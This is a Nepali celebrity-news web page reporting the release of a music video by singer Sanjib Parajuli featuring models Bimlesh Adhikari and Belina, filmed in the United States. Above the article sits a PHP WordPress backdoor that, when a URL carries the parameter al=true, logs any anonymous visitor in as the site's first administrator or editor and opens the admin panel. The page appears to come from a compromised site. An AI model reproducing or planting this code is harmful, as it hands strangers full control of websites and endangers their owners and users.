// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); मोडल विमलेश र बेलिनाको अमेरिकामा भएको रोमान्स सार्बजनिक (भिडियो) | Celebrity Nepal

मोडल विमलेश र बेलिनाको अमेरिकामा भएको रोमान्स सार्बजनिक (भिडियो)


सेलिब्रेटी नेपाल काठमाडौँ
विदेशमा रहेर पनि नेपाली सांगीतिक क्षेत्रमा क्रियाशील गायक सन्जिब पराजुलीको नयाँ भिडियो सार्वजनिक भएको छ । विदेशमा रहेर पनि आफ्नो पनलाई र आफ्नो कलालाई संंगै लिएर हिडेका गायक पराजुलीको आवाजमा एल्बम ‘सुनय’ भित्रकै अर्को गीत ‘चाहनामा म तिम्रो’ को भिडियो सार्वजनिक गरिएको छ । सार्बजनिक गीतमा शब्द रचना तथा संगीत हर्कुलस बस्नेतको रहेको छ भने संगीत संयोजन अल्मोडा राना उप्रतीको रहेको छ ।
bimlesh-belina
म्युजिक भिडियोलाई चर्चित निर्देशक प्रशन्न पौडेलले निर्देशन गरेका हुन् । भिडियोमा विमलेश अधिकारी र बेलिना अभिनयलाई देख्न सकिन्छ । राजिव र अनुपको संयुक्त छायांकनमा तयार भएको भिडियोलाई हिमाल जोशीले सम्पादन गरेका हुन् । भिडियोमा अमेरिकाका विभिन्न रमणिय दृश्यलाई कैद गरिएको छ । भिडियो लाइ गायक सन्जिब पराजुलीको आफ्नै आफिसिएल यु ट्युब मार्फत सार्बजनिक गरिएको हो।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.